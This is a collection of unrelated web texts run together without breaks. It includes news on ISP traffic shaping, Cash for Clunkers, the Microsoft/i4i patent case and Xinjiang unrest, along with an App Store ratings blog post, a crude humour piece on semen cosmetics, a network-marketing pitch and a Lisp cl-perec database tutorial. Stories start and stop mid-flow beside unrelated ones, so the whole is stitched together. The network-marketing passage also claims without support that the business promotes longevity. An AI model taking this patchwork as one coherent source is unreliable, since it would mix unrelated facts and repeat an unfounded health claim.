These would allow ISPs like Bell to " take into account the real time vs. non-real time nature of applications ( e.g. gaming vs. downloads ) , " which is just a way of saying that ISPs should have the right to decide if that Linux .iso you 're downloading is something that you need immediately or if you can wait a while on it .
Consumer groups are outraged at these kinds of proposals , of course , and so is the Canadian Broadcasting Corporation , the country 's public broadcaster .
In its own comments last week , the CBC argues that traffic shaping really is about " innovation " — but innovation at the edges .
" CBC / Radio - Canada believes the debate surrounding P2P provides the best argument for prohibiting any type of protocol - specific traffic management , " says the filing .
" It would be profoundly bad public policy to permit ISPs to constrain innovation by way of shortsighted traffic management targeted at today or tomorrow ’s ' problem child . '
All traffic management practices should be protocol agnostic . "
Sandvine thinks that 's " laughable . "
Find your next Car New
Used Select a Make Acura Aston Martin Audi Bentley BMW Bugatti Buick Cadillac Chevrolet Chrysler Dodge Ferrari Ford GMC Honda HUMMER Hyundai Infiniti Jaguar Jeep Kia Lamborghini Land Rover Lexus Lincoln Lotus Maserati Maybach Mazda Mercedes - Benz Mercury MINI Mitsubishi Morgan Nissan Pontiac Porsche Rolls - Royce Saab Saturn Scion smart Subaru Suzuki Tesla Toyota Volkswagen Volvo Select a Make Acura Aston Martin Audi BMW Bentley Buick Cadillac Chevrolet Chrysler Dodge Eagle Ferrari Ford GMC Geo Honda Hummer Hyundai Infiniti Isuzu Jaguar Jeep Kia Lamborghini Land Rover Lexus Lincoln Lotus MG Maserati Mazda Mercedes - Benz Mercury Mini Mitsubishi Nissan Oldsmobile Plymouth Pontiac Porsche Rolls - Royce Saab Saturn Scion Smart Subaru Suzuki Toyota Volkswagen Volvo
WASHINGTON �( CNNMoney.com ) -- President Barack Obama signed a bill Friday morning that breathes new life into the popular Cash for Clunkers program .
" Now , more American consumers will have the chance to purchase newer , more fuel efficient cars and the American economy will continue to get a much - needed boost , " President Obama said in a statement .
The move extends the Cash for Clunkers program that had burned through its initial $ 1 billion in funding in its first week .
The Senate had voted 60 - 37 to approve an additional $ 2 billion for the program late Thursday evening , in a rush to finish business before their August recess .
The House had already voted to extend the program last Friday .
" This will be a great weekend to go out and buy an American made auto , " Sen. Debbie Stabenow , D - Mich . said in a press conference after the Thursday night vote .
During the debate , Senate Republicans offered a half dozen amendments to the program .
One would have banned all future bailouts and another would have provided tax credits to spur more home sales .
But Sen. Carl Levin , D - Mich. , warned that any attachments would bounce the bill back to the House , delaying the program until after the summer break in September .
Although the vote mostly went along party lines , seven Republicans voted for it and four Democrats voted against the measure .
Getting enough Senate votes to extend the program was no easy task .
Levin said late Thursday that this clunkers extension is likely the last Congress is willing to give .
" Never say never , but at this point , this is probably the extent of the program , " he said .
How it 's going
Under the Clunkers program as enacted , vehicles purchased after July 1 are eligible for refund vouchers worth $ 3,500 to $ 4,500 on traded - in gas guzzlers .
The trade - in vehicle has to get a combined city and highway fuel economy rating of 18 miles per gallon or less .
According to government figures , compact cars and hybrids have been the top sellers so far .
With at least $ 775 million already spent , the kinds of autos flying off the lots include the Ford Focus , Toyota Corolla and Ford Escape .
The government and an independent analysis by Edmunds.com show different results for which cars and trucks are the top sellers .
The sales results indicate that consumers are buying more fuel - efficient vehicles than most people expected .
The average combined city and highway fuel economy of the 10 cars ranges from at 27 to 33 miles per gallon , depending on which versions people choose .
While critics had feared that car shoppers would use the program mostly to buy trucks , in fact 83 % of the vehicles traded in have been trucks and SUVs while 60 % of vehicles purchased were passenger cars , according to Secretary of Transportation Ray LaHood .
The broad category of SUVs includes many small car - like crossover SUVs , including the Escape .
Last month , many of the vehicles with the biggest reported year - over - year sales gains were small crossovers , a fact that several of the top automakers attributed to the Cash for Clunkers program .
The average fuel economy of new vehicles being purchased under Cash for Clunkers is 25.4 mpg , LaHood said , and the average fuel economy increase from the old vehicle to the new is about 61 % .
--CNN congressional correspondents and White House senior correspondent Ed Henry contributed to this report .
Are you part of a Detroit - area family with a tradition of working in the automotive industry ?
Send an email to gmannes@moneymail.com and you could be included in an upcoming Money magazine story .
Word 2003 and 2007 are the most common versions on the market
A US federal court has ordered Microsoft to pay over $ 290 m ( £ 175 m ) for wilfully infringing on a patent by Canadian firm i4i .
The patent relates to the use of XML , a mark - up language that allows formatting of text and makes files readable across different programs .
XML is used in recent versions of Microsoft 's word - processor Word .
Texas district court judge Leonard Davis also filed an injunction preventing Microsoft from selling Word .
The row specifically relates to the use of Extensible Mark - up Language , or XML , documents .
I4i filed a patent in 1998 that outlined a means for " manipulating the architecture and the content of a document separately from each other " invoking XML as a means allowing users to format text documents .
XML is also used extensively among other word - processing programs such as OpenOffice .
Wilful
Earlier this year , the court found in a jury trial that Microsoft had infringed the patent and awarded i4 i $ 200 m ( £ 120 m ) .
In the latest ruling , the court ordered Microsoft to pay $ 40 m ( £ 24 m ) for the wilful nature of the infringement and interest on the amounts totalling more than $ 40 m .
In a separate injunction , the court prohibited Microsoft from " selling , offering to sell , and / or importing in or into the United States " any version of the software that can open custom XML files ( with file extensions .xml , .docx , or .docm ) .
XML is integral to some of the company 's programs , such as Word 2007 .
Microsoft has 60 days to comply with the injunction but said in a statement that it will appeal the ruling .
" We are disappointed by the court 's ruling , " said Microsoft spokesperson Kevin Kutz .
" We believe the evidence clearly demonstrated that we do not infringe and that the i4i patent is invalid .
We will appeal the verdict . "
January 14th
Dear friend .
My sojourn in parts foreign is at an ende .
I am at lodgings in Southwark not far from the bridge at Stoney Street , come dine with me two days hence to ring in the newe year .
I have not enjoyed amiable English companie for some long time and it would be refreshing to hear my mother tongue used in its proper manner again .
Your friend ,
John Croft .
When you receive this note from your old acquaintance John Croft , you expect nothing but an evening of good food and drink and Croft 's lecherous tales .
Instead , you quickly find yourself plunged into a conspiracy of black magic that involves not only Croft but some of the most powerful and important men in London -- and possibly even someone else , someone much closer to your own heart .
The King of Shreds and Patches is a novel - length work of interactive fiction .
In it you will explore an historically accurate recreation of Elizabethan London , circa 1603 , interact with some fascinating characters both historical and fictional , and ( if you are clever and lucky ) thwart an occult conspiracy that threatens to bring down the entire city -- or worse .
Over two years in development , King features :
Roughly 12 to 15 hours of play time
A convoluted , compelling mystery to piece together
Realistic interactions with more than a dozen potential friends or suspects -- or both
Realistic action sequences
A huge variety of puzzles to solve in a variety of ways
An integrated context - sensitive hint system designed to give you only the information you need
An auto -map to make finding your way around London a snap
An RPG - style " quest tracking " system to keep you always oriented to your current goals and your place in the story
An integrated tutorial to get those new to interactive fiction into the swing of things quickly and easily
... and much , much more , all in the service of a rich story presented through a sophisticated drama management system .
July 15 , 2009 ∞https://marco.org/2009/07/15/theres-a-pretty-significant-problem-in-the-new
There ’s a pretty significant problem in the new App Store ratings system .
( Do n’t worry , you can depend on me to blog about it ! )
Instapaper Pro 2.1 was rejected because I had rated it like this — the current live rating for Instapaper Free — based on a comment that an Apple engineer made at WWDC .
That was n’t restrictive enough to get my Pro 2.1 update approved :
We ’ve reviewed Instapaper Pro and determined that we cannot post this version of your iPhone application to the App Store at this time because it is not appropriately rated .
Our review indicates that the application content is not consistent with the current rating .
Instapaper Pro allows unfiltered access to the internet , where content with mature or suggestive themes can be accessed .
Applications must be rated accordingly for the highest level of content that the user is able to access .
In other words , every app that allows users to see unfiltered internet content must be rated “ 17 + ” .
I guess that ’s somewhat reasonable .
But this is how the ratings form looks .
It ’s vague , and it ’s not entirely clear to “ unfiltered internet ” app authors which of these may apply .
If your app can display arbitrary images or videos , that could technically include nearly everything on the form except “ Simulated Gambling ” .
The App Store reviewer cited only “ Mature / Suggestive Themes ” , but I should probably also include “ Profanity or Crude Humor ” , and I ’m required by the policy to set them to “ Frequent / Intense ” ( otherwise my submission , set to Infrequent / Mild , would have been accepted ) .
But the rating criteria I choose show up on the App Store pages like the photo above .
That means , right under Instapaper Pro ’s icon , it will need to say at least :
Frequent / Intense Mature / Suggestive Themes
Frequent / Intense Profanity or Crude Humor
It ’s misleading at best .
And that ’s assuming that Apple ignores the possibility that someone could technically use Instapaper to save any web page of their choosing , including those containing violence , references to alcohol and drug use , horror / fear themes , and graphical sexual content .
( Safari , of course , has the same range of potential offenses , with the addition of potential real and simulated gambling . )
These prominent notices make my app look pretty terrible in the App Store .
I ’ve already received emails from people asking why Instapaper Free is suddenly rated “ 12 + ” .
How is it going to look when I need to update them both to “ 17 + ” citing frequent / intense mature themes and crude humor ?
The solution to this is simple .
Add another ratings criteria to the form : “ Unfiltered Internet Content ” .
Make it a simple true / false value instead of an intensity level .
If set , the rating goes to “ 17 + ” and it displays only “ Unfiltered Internet Content ” below the app ’s icon in the Store .
Not that I have any hopes that Apple would actually do that .
Longevity with Network Marketing
Perhaps you will wonder how longevity and network marketing fit .
Let me tell you a story to explain :
I come from a family where longevity is kind of the “ general family feature ” .
On my maternal as well as on my paternal side many of my forefathers lived well into their nineties .
The fascinating thing about it is , that the people in my family stay active even at that age .
Therefore people tell me – “ you really have excellent genes and therefore a high likelihood of getting very old ” .
However , as a standard reply I tell them that not only my blood relations turn old in good health , but that also the respective partners , who marry into the family and who of course do not share our genes , become just as old as a rule .
To me this clear evidence that longevity is not only a question of genes , but to just the same extent it is a question of personal attitude and lifestyle .
Lifestyle of course means leading a fairly healthy life with proper food , enough sleep , a certain amount of physical activity to make sure the system gets enough oxygen , but also mental activity so that the brain ’s alertness is maintained .
Lots of work we find does n’t harm at all !
Attitude is your personal mindset as to how you approach life , your pattern of thoughts , mental activity , readiness to be open and forward , making plans and living a life with a focus and goals .
Attitude is the link to network marketing .
Network marketing is an industry where people have to learn as to how to improve their attitude , how to specify their desires , make plans , go forward and blend with the world and the people in it , all of which creates an environment of mental activity , positive thought patterns and a zest for life and joy that in turn forms an excellent basis for longevity at perfect health .
Time will show if in years to come the ratio of network marketers among the people who become old will be exceptionally high – right now lots of things indicate that this may well be so .
You feel you want to know how to proceed in this direction ?
Well – simply be in touch and start communicating .
We ’ll help you find out where to go or where your focus in life may be .
Frieke
Your Mentor with a Servant ’s Heart
When you rip a DVD to your Mac you end up with a VIDEO_TS folder , which can be dragged to DVD player icon to play the DVD ( you might find some stubborn DVDs will only play in VLC though ) .
As the DVD media is a folder , obviously you can't double - click it to open it in DVD Player .
Instead you have to do the cumbersome open - the - app - then - drag - and - drop - to - icon procedure .
The way around this is to rename the folder with the .dvdmedia extension .
This will turn the folder into a bundle , and add a nice DVD icon as well .
Double - clicking this will automatically open it up in DVD player , but you can easily change this to another app like VLC for example .
The easiest way is to choose Get Info on the bundle , choose the new app from the " Open with " section , and click the " Change All ... " button .
While you are in the Get Info window you might also want to click “ Hide Extension ” and rename the bundle to the name of the movie .
You can also change the icon to the artwork for the movie which you can get from a site like Get Video Artwork .
One annoying side effect of this is that Front Row wo n't recognise dvdmedia bundles , whereas it will recognise VIDEO_TS folders .
Of course , to get your movies to work well in the Finder , Quicktime iTunes , Front Row and iPhone all at the same time you might prefer to run them through a tool like HandBrake .
This can also save you some space depending on how you encode them .
In Istanbul , Turkish protesters burned the Chinese flag at a rally Turkey 's prime minister has described ethnic violence in China 's Xinjiang region as " a kind of genocide " .
" There is no other way of commenting on this event , " Recep Tayyip Erdogan said .
He spoke after a night - time curfew was reimposed in Xinjiang 's capital , Urumqi , where Muslim Uighurs and Han Chinese clashed last Sunday .
The death toll from the violence there has now risen from 156 to 184 , China 's state - run Xinhua news agency reports .
More than 1,000 people were injured .
Turkey is secular but the population is predominantly Muslim and it shares linguistic and religious links with the Uighurs in China 's western - most region .
Quentin Sommerville , BBC News , Urumqi
After Friday 's prayers , a small group of Uighur Muslims marched along an Urumqi street demanding the release of men detained for their alleged role in last Sunday 's riot .
A large number of riot police surrounded the group , they punched and kicked the protestors - one officer used his baton to beat one of the Uighurs .
A number of foreign journalists had their equipment seized , some have been detained .
Earlier the group said they feared for their safety .
There 's no word from the authorities as to what happened to them .
In pictures : Closed mosques New media openness Q&A : China and the Uighurs " The event taking place in China is a kind of genocide , " Mr Erdogan told reporters in Turkey 's capital , Ankara .
" There are atrocities there , hundreds of people have been killed and 1,000 hurt .
We have difficulty understanding how China 's leadership can remain a spectator in the face of these events . "
The Turkish premier also urged Beijing to " address the question of human rights and do what is necessary to prosecute the guilty " .
Mr Erdogan 's comments came a day after Turkish Trade and Industry Minister Nihat Ergun urged Turks to boycott Chinese goods .
Beijing has so far not publicly commented on Mr Erdogan 's criticism .
But it said that of the 184 people who died , 137 were Han Chinese .
Uighurs defiant Earlier on Friday , the Chinese authorities reimposed a night - time curfew in Urumqi .
The curfew had been suspended for two days after officials said they had the city under control .
Mosques in the city were ordered to remain closed on Friday and notices were posted instructing people to stay at home to worship .
XINJIANG : ETHNIC UNREST
Main ethnic division : 45 % Uighur , 40 % Han Chinese 26 June : Mass factory brawl after dispute between Han Chinese and Uighurs in Guangdong , southern China , leaves two Uighurs dead 5 July : Uighur protest in Urumqi over the dispute turns violent , leaving 156 dead - most of them thought to be Han - and more than 1,000 hurt 7 July : Uighur women protest at arrests of menfolk .
Han Chinese make armed counter - march 8 July : President Hu Jintao returns from G8 summit to tackle crisis
Taboo of ethnic tensions Profile : Rebiya Kadeer Xinjiang : Views from China
But at least two opened after crowds of Uighurs gathered outside and demanded to be allowed in to pray on the holiest day of the week in Islam .
" We decided to open the mosque because so many people had gathered .
We did not want an incident , " a policeman outside the White Mosque in a Uighur neighbourhood told the AP news agency .
After the prayers , riot police punched and kicked a small group of Uighurs protesters , who demanded the release of men detained after last Sunday 's violence , the BBC's Quentin Sommerville says .
Meanwhile , the city 's main bus station was reported to be crowded with people trying to escape the unrest .
Extra bus services had been laid on and touts were charging up to five times the normal face price for tickets , AFP news agency said .
" It is just too risky to stay here .
We are scared of the violence , " a 23 - year - old construction worker from central China said .
The violence began on Sunday when a Uighur rally to protest against a deadly brawl between Uighurs and Han Chinese several weeks ago in a toy factory in southern Guangdong province turned violent .
Tensions have been growing in Xinjiang for many years , as Han migrants have poured into the region , where the Uighur minority is concentrated .
Many Uighurs feel economic growth has bypassed them and complain of discrimination and diminished opportunities .
Are you leaving Urumqi ?
What has been your experience of the unrest in the city in recent days ?
Please send us your comments using the form below :
Name
Your E-mail address
Town & Country
Phone number ( optional ) :
Comments
The BBC may edit your comments and not all emails will be published .
Your comments may be published on any BBC media worldwide .
Terms & Conditions
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
If you really must offend someone , wait until they are lying down : people handle anger differently when they ’re lying on their backs , compared with sitting upright .
University students who heard personal insults while seated exhibited brain activity linked to so - called “ approach motivation ” – the desire to approach and explore something .
This potential urge disappeared when students took their insults lying down , despite their anger remaining .
“ In the upright or leaning forward state one might be more likely to attack , ” says Eddie Harmon - Jones , a cognitive scientist at Texas A&M University in College Station , who led the study .
“ Maybe in the reclining state you ’re more likely to brood . ”
Harmon - Jones worries that MRI studies performed on subjects lying on their backs – which is practically all of them – could miss the neural signatures of certain emotions .
Advertisement
Seeing red
It is n’t every study that requires researchers to infuriate their volunteers , and Harmon - Jones and his colleagues have honed their technique over more than decade .
Students are not told that they are participating in an anger study .
The researchers instead ask them to pick a hot - button issue , such as abortion or public smoking , and write a brief essay on their stance .
Next , they are hooked to an electroencephalograph , which measures electrical pulses created by firing neurons , and told that a person in an adjacent room will evaluate the essay .
This is a ruse , and Harmon - Jones ’s team play a voice recording of someone disparaging the intelligence , likeability and logical skills of the essayist .
“ People get angry in response to this kind of feedback , ” he says .
Chilled out
Volunteers who heard these insults while on their backs felt as angry as volunteers who were seated .
But EEG recordings showed that , for the upright volunteers , a brain region called the left prefrontal cortex was more active than its counterpart in the brain ’s right hemisphere .
Other research has linked this lopsided activation to anger and approach motivation .
Volunteers who received their digs while lying down , however , exhibited EEG patterns no different from subjects who got slightly positive reviews , Harmon - Jones says .
He thinks lying down could affect how the brain handles other emotions , such as desire and happiness .
The mental shift provoked by lying down may even be strong enough to affect the results of brain - imaging studies performed on people lying on their backs .
Unnatural circumstances
“ It ’s unknown how much of an effect this has , but this study suggests that people should start looking to see if body position is affecting processing in other types of experiments , ” Harmon - Jones says , noting that most of our decisions are made while we ’re upright , not lying down .
Peter Bandettini , a brain imager at the National Institute of Mental Health in Bethesda , Maryland , agrees – to a point .
“ It never occurred to me that body position might influence behavioural or neuronal activity in the context of aggression – but it makes sense , ” he says .
“ I do think that this is somewhat specialised to things like aggression or anger . ”
After all , he says , it ’s not as if neuroscientists pretend that massive , tunnel - like MRI scanners are exact replicas of regular human environments .
“ The scanner noise , closed space , and generally very alien context might influence the results of other studies as well , ” Bandettini adds .
Journal reference : Psychological Science ( DOI : 10.1111/j.1467-9280.2009.02416.x )
Copyright laws were once written to allow content creators to protect their work , but at an increasing rate copyright is used to carefully extract money from file - sharers .
Some tracking companies go as far as leasing copyrights , with the sole intent of setting up a ' honey pot ' for pirates .
In the past months we ’ve seen that the RIAA has won two prominent lawsuits , raking in $ 1.92 million and $ 675,000 respectively .
At the same time and outside of the spotlights , thousands of file - sharers were contacted in what can only be described as a pirate ‘ honey pot . ’
Meet Digiprotect , the pirate tracking company that earned its marks tracking down ‘ adult ’ pirates , but branched out to protecting the works of all sorts of copyright holders .
Over the years the company has perfected its pirate tracking tactics to guarantee maximum profits .
Although most companies operating in the same realm try to fly under the radar as much as possible , Digiprotect ’s account manager Thomas Hein is more vocal about their business strategies .
In an interview he gave a while ago he explains how his company leases copyrights so they can trap potential downloaders .
“ We get the legal rights from the companies to distribute these movies to stores , and with these rights we can sue illegal downloaders .
Then we take legal action in every country possible , concentrating on the places where such action will be profitable , ” Hein says .
So Digiprotect acquires the right to distribute movies , music or games from the rights holders , which they then share on various P2P networks .
All they have to do is wait for people to take the bait .
If someone tries to download the file they collect the IP - address and initiate legal action through one of their befriended law firms .
That is , if it ’s profitable , otherwise Digiprotect ca n’t afford to protect the copyright holder ’s rights , as Hein explains .
“ No one working for DigiProtect has a fixed salary .
If we make money , everybody makes money .
If we do n’t , nobody does .
This means the lawyers , sales people and customers .
It ’s all about how much money can be recouped and then sharing it . ”
Indeed , it ’s all about the money .
“ Our success rate is high enough to make good money for everybody , ” Hein says , “ and it ’s also high enough to deter people from stealing content in the future .
But we have to be careful about the amount of damages we ask for . ”
So how does one go about making ‘ good money ’ ?
Apparently it ’s not only important where you sue people , but also the amount of damages you claim .
“ We try to find a figure that covers our costs and pays money to our licensors , which is usually around 500 Euro ( $ 700 ) .
Other firms are going for huge amounts of money , and the judges do n’t like it .
If the judges feel you ’re being greedy , they wo n’t rule in your favor . ”
Yes , you ’re reading it right .
The damage figures are not based on any actual losses , they are carefully calculated to guarantee maximum profits for all parties , except the alleged pirate of course .
We ca n’t help but wonder who the real thieves are here …
We live in an era of recycling , where hippies scream in horror if they spot a soda can in the garbage and go into convulsions at the thought of a landfill full of paper .
But if you think glass bottles , milk jugs and CSI are the only things that can be recycled , read on .
The next dump you take could be used to build a school in Japan .
6 Your Semen
What is it Good For ?
Beauty Treatments .
Continue Reading Below Advertisement
Generations of frat guys told women " It 's good for your skin ! " in a desperate scheme to find willing targets for their mayonnaise cannons .
As it turns out , not only is this claim apparently true , but several companies are actually peddling brogurt as the next great beauty cream ingredient .
The hilariously named Cmen Beauty Now offers discreet shipping of the pure product straight to the buyer 's home , along with reassurances of the stock being disease - free and provided by individuals who are " tested monthly . "
They really have to boast about their quality control , because their competition is a whole nation full of guys drunkenly offering to apply it directly to the customer 's face at no cost ( high five , bro ! ) .
Continue Reading Below Advertisement
Meanwhile , Skinscience , a Scandinavian company , is marketing an entire line of Spermine beauty creams and serums .
Spermine is an antioxidant found in human semen that 's said to be 30 times stronger than vitamin E and able to repair sunburned skin , based on results Skinscience gathered after testing their products on 3,000 women ( curiously , no men signed up to participate in the " rub sperm all over your face and sprinkle some on that sunburned back of yours as well " tests ) .
We note that both of these companies make zero effort to disclose where exactly they 're getting their massive quantities of semen from .
So until we get some transparency to this process we 're forced to imagine a hand - made sign and a line of hobos that stretches all the way around the block .

The key to the long - held perception that money market funds are akin to savings accounts is that stable $ 1 “ net asset value , ” or N.A.V .
But it was n’t always that way .
When money market funds were first created in the early 1970s , they had a “ floating ” N.A.V. , just like any other kind of mutual fund .
On the day a fund opened , it would be set at $ 10 a share .
Investors would get the numbers of shares that equaled their investment .
The fund manager tried to maintain that price , but it would often fluctuate between , say , $ 9.97 and $ 10.03 .
“ Most days , though , it stayed at $ 10 , ” recalled Matthew P. Fink , the former president of the Investment Company Institute , and the author of “ The Rise of Mutual Funds . ”
But even when it did n’t , the world did n’t come to an end .
By the time money funds became truly popular , however , they did have that fixed $ 1 share price .
This was during the early 1980s , when interest rates had skyrocketed and money funds  unlike regulated savings accounts  offered market rates of interest .
In the late 1970s , the industry had persuaded the S.E.C. to allow it to move to a stable N.A.V. , which it pushed for precisely because it wanted money funds to resemble a bank account , with which they were competing .
( Money funds even came with checks attached . )
To accomplish this , a series of new regulations were required , one of which exempted money funds from mark - to - market accounting , while others imposed limits on the kinds of short - term securities they could hold .
I ’ve always believed that the invention of money market funds was the secret key to the rise of the mutual fund industry .
People flocked to them in the early 1980s because they were the only tool available to prevent middle - class savings from being eroded by inflation .
Then , when the bull market began in 1982 , Americans gradually moved that money into mutual funds .
But money market funds did n’t fade away , even after bank savings accounts were deregulated .
Throughout their history , they offered higher yields than people could get at the bank , and even though they lacked government insurance , people used them the same way they used a bank account : as a place to park cash .
The industry became so committed to the idea that money funds should serve as alternatives to bank accounts that on the rare occasions when a money fund threatened to break the buck  that is , lose a penny or two  the company that owned the fund invariably put up the cash to prevent any losses .
When the Reserve Fund broke the buck last year , it was only the second time that had ever happened .
( The first time involved a much smaller fund , and had much less impact . )
The industry , having built the business on the foundation of the $ 1 share price , reacted in horror .
But when you think about it , the Reserve Fund did n’t really “ collapse . ”
Rather , one of its securities defaulted and it lost a few pennies for its investors .
It happens .
The problem is that the fund industry has spent so many years training people to believe this could never happen , that they inevitably panicked when it did .
And that panic , in turn , is what caused the government to rush to the rescue with its guarantees .
A banner and bunting has been erected at Susan Boyle 's home in Blackburn , West Lothian
Neighbours in Susan Boyle 's home town are urging the Britain 's Got Talent star to come home so she can get the support of her local community .
Police were called to a London hotel at 1800 BST on Sunday , where doctors were assessing a woman under the Mental Health Act .
The Sun said the singer was admitted to the Priory clinic with exhaustion .
Neighbours said they were " devastated " the star , who came second in the ITV1 show , had been taken to a clinic .
They said the 48 - year - old should come home to Blackburn , West Lothian .
Please turn on JavaScript .
Media requires JavaScript to play .
Gary Barkhouse , 41 , said : " Now that she is in the clinic , it 's devastating to the whole community .
" I think it is time for her to come home , take stock of what 's happened , and take it from there .
" That way she will have the support of everyone . "
Another neighbour , Elaine Clark , 47 , said : " This is a close - knit community , we all stick together , we all look after one another .
Everyone looks out for Susan here .
" Now it 's just time for her to come home and get back to some normality . "
She also praised Boyle 's performance on the TV talent show , saying : " She 's done fantastically well , it 's been uplifting for the whole community . "
' Ordinary person ' Michelle McCabe , 34 , said she was " just devastated " when she heard reports that her neighbour had been taken to a clinic .
Miss McCabe said : " I feel she deserved a little bit more support .
" What has happened to her is so sad .
I hope she makes a full recovery because she has an amazing career in front of her . "
Miss McCabe said her neighbour must have been under a massive amount of pressure .
She said : " There are stars in America who have taken years and years to get that much press attention - it took Susan seven weeks .
" And it 's a lot to deal with for an ordinary person from Blackburn . "
Speaking to the BBC , Boyle 's brother Gerry said the singer was " fine " but feeling homesick .
" Susan just wants to come home and see her cat , " he said .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
So , you want to write a database - backed Lisp thang .
You 've certainly got plenty of options : elephant , postmodern , and cl- perec , to name a few .
Elephant you rule out because it does n't play very well with non-elephant applications ( last I checked , anyway ) .
Postmodern you rule out because , while pretty close to what you want , cl- perec 's associations are dreamy and your data involves a lot of relationships .
First , you 'll need to get postgresql and cl-perec .
For postgres , use the closest available package management system if at all possible .
For cl- perec , because its list of dependencies is long and troublesome , I recommend acquisition using clbuild¹ .
That 's how I did it , and it 's worked out pretty well so far .
Second , we need to create a database , and a user who can access that database .
See postgres ' Manual for details .²
It 's long and complicated , so I 'll see you next week .
Back already ?
Excellent .
Now we need to tell cl- perec about our database .
That starts with creating a class for the database connection .
I do n't know why , it just does .
( defclass database - connection ( cl- perec:database-mixin cl-rdbms:postgresql-postmodern ) ( ) )
The required cl- perec: database - mixin provides some of the necessary machinations for our database - connection class to be recognized properly by cl- perec .
cl-rdbms : postgresql-postmodern represents the underlying data store — you might also use cl- rdbms : oracle or cl-rdbms : sqlite , depending on which database you want .
Then we can create a variable to hold an instance of our new class .
Or , in this case , we 'll use the variable thoughtfully provided by cl- perec . ⁸
( defparameter cl- perec : * database * ( make - instance ' database - connection : connection - specification '( : database " test_db " : user - name " test_user " : password " test_password " ) ) )
Exciting , no ?
Finally , we can venture into the land of ORM and create our tables . ⁷
( cl- perec: defpclass * generic - guy ( ) ( ( name " Ted " : type string ) ( tie -color : blue : type ( member : blue : green ) ) ) )
Over in pgsql , we do a \dt and see … nothing .
That 's because cl- perec does n't create the tables until you try to create an object using those tables .
Since a database with no data is pretty useless , this is n't really a big deal .
Still , if you really want to force those tables into existence even without data , cl - perec : : ensure - exported is what you 're looking for . ³
cl - perec demands everything happen within a transaction , which means we 're going to have to wrap everything we type at the REPL in a with - transaction so we can see its results over in pgsql right away .
So , if you are n't already using it , look into slime - fuzzy - completion : it dramatically reduces the amount of typing necessary to produce a long symbol .
That out of the way , it 's time to create our first generic - guy .
( cl - perec : with - transaction ( make - instance ' generic - guy : tie- color : green ) ) => #< GENERIC-GUY : persistent t>
( inspect *) => ERROR
Whoops !
You can't access the slots of a persistent object outside of a transaction .
We 're just playing around though , so let 's opt out of that requirement .
( setf ( cl- perec: persistent - p *) nil )
Now we can ( inspect **) without worrying about transactions — just do n't expect to see any changes reflected in the database !
Back in pgsql , we notice that all the table and column names created for us by cl-perec are prefixed by incredibly ugly underscores .
test_db= > \dt+ List of relations Schema Name Type Owner Description public _generic_guy table test_user
test_db= > select * from _generic_guy ; _oid _name _tie_color 996143
Ted 1
This is n't really what we want because , well , why would we want it ?
We 're using an underlying SQL database so other applications in other programming languages can also get at the data , and forcing an underscore prefix on them is n't really very nice .
Fortunately , our heretofore seemingly pointless database - connection class can help us make changes without affecting any other cl- perec - using code .
;; I 'm not a fan of having an underscore prefix ;; everything in postgres .
( defmethod cl-rdbms : : calculate - rdbms - name ( ( db database - connection ) thing name ) " Cuts off the end of names that are too long and appends the hash of the original name .
WARNING : This name mapping is not injective , different lisp names / may / be mapped to the same rdbms name . "
( cl-rdbms::calculate-rdbms-name-with-utf-8-length- limit name cl-rdbms.postgresql::+maximum-rdbms-name-length+ : prefix " " ) )
The usage of cl-rdbms internals is unfortunate , but I did n't see an easier way to eliminate the underscore prefix .
( If you know of one , feel free to let me know . )
Unfortunately , now you 're going to run into a bit of trouble : cl- perec ( quite reasonably ) stores the results of calculate - rdbms - name , which means old tables are going to continue using the underscore - prefixed names , while any new tables will use the prefix - less variants .
Fortunately , we 're just playing around so nuking the database and restarting the lisp image⁴ is a -okay , if suboptimal .
( Redefining your class might work , too . )
Retracing our prior steps after we 've redefined our name mapping , we can see the results in pgsql .
test_db= > \dt+ List of relations Schema Name Type Owner Description public generic_guy table test_user
test_db= > select * from generic_guy ; _oid name tie_color 1127215 Ted 1
Much prettier !
Anyway , now that we have a generic_guy table , and Ted , the green - tied generic guy , it 's time to start thinking about relationships .
But before we can worry about relationships , we need somebody or something to which we can relate .
We could model Ted 's love life , but instead we 'll model his employment .
First , we 'll need a heartless corporation .
( cl- perec: defpclass * corporation ( ) ( ( name : type string ) ( evilness 5 : type ( integer 0 10 ) ) ) )
( cl - perec : with - transaction ( make - instance ' corporation : name " Initech " : evilness 8 ) ) => #< CORPORATION : persistent t>
Then we can begin defining employee - employer relationships ⁵ and make Ted work for Initech .
( cl- perec: defassociation * ( ( : class corporation : slot employees ;; NOT cl:set ! : type ( cl- perec: set generic - guy ) ) ( : class generic - guy : slot employer : type corporation ) ) )
; ; assuming * ted * and * initech * contain our ; ; previously - created objects ( cl - perec : with - transaction ; ; revive - instance imports an instance into the ; ; current transaction ( cl - perec : revive - instances * ted* * initech * ) ( setf ( employer - of * ted * ) * initech * ) )
Congratulations
Ted , you 've been hired !
Note how cl- perec handles the other direction of the relationship for us .
( cl - perec : with - transaction ( cl - perec : revive - instances * initech * ) ( employees - of * initech * ) ) => ( #< GENERIC-GUY : persistent t>) ; '( Ted )
Also notice how cl- perec altered the tables to handle our new relationship all by itself .
test_db= > select * from generic_guy ; _oid name tie_color employer_oid 1127215 Ted 1 1232276
test_db= > select * from corporation ; _oid name evilness 1232276 Initech 8
As you can see , in spite of some rather spartan documentation , cl - perec is n't too bad , ⁶ so get out there and start defining your data .
I 'll be back with more when I get to that point in my application — but do n't hold your breath ' cause I 'm pretty slow . :)
clbuild is essentially a technical solution to the social problem of Lispers being terrible at proper releases .
Like most open - source projects geared towards programmers , it assumes a POSIX system — if you 're on Windows , you 've got two options : install a posix system ( in a VM is probably fine ; on an old , unused box works well too ) , or shell out for AllegroCache ( which has the advantage of actual documentation , though it 's closer in spirit to Elephant ) .
I ended up with something like sudo -u postgres createdb … sudo -u postgres createuser …
But your environment may differ .
When I figure out how to do it a second time , I 'll hopefully remember to update this with specifics .
e.g. , ( cl- perec : with - transaction ( cl- perec : : ensure - exported ( find-class ' generic - guy ) ) )
Around this time I managed to bork SBCL 's class definer and had to restart lisp if I wanted to define or alter any new classes , so I never bothered to look into what needed to change to start using the new , prettier names .
You probably should n't change the name mapping in a production system anyway .
While you could achieve similar results by amending the generic - guy class to add an ( employer nil : type ( or corporation null ) ) slot , you would n't get the otherwise - free employees - of method .
Regardless , you 'll need to know defassociation for M - N relationships .
Some of the coding conventions are a bit annoying ( e.g. , the #t / #f readmacros in place of t and nil ) , but that 's a rant for another day .
